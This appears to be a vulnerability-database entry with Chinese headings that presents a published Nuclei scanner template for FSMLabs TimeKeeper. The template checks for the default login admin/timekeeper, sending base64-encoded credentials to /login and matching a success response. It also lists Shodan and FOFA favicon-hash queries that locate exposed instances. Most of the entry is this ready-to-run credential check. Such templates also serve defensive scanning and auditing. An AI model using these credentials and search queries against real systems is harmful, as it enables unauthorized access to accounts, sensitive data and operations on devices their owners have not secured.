漏洞描述
TimeKeeper contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
timekeeper-default-login: TimeKeeper - Default Login
PoC代码[已公开]
id: timekeeper-default-login
info:
name: TimeKeeper - Default Login
author: theamanrawat
severity: high
description: |
TimeKeeper contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://fsmlabs.com
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:2134367771
product: timekeeper
vendor: fsmlabs
fofa-query: icon_hash=2134367771
tags: timekeeper,default-login,vuln
http:
- raw:
- |
GET /login?arg1={{url_encode(base64(username))}}&arg2={{url_encode(base64(password))}} HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- "admin"
password:
- "timekeeper"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "%7B%20%22username%22%20%3A%20%22admin%22%2C%20%22result%22%3A%20%22OK%22"
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4a0a004730450220756513879bb756914616ff172c2da18eaa757dd8260e7fee1922e6f2d3b2886f022100cf94bb79fc9dfa520808f214a511bf2237a24fb6ab8d7a1099478fc59bc133a5:922c64590222798bb761d5b6d8e72950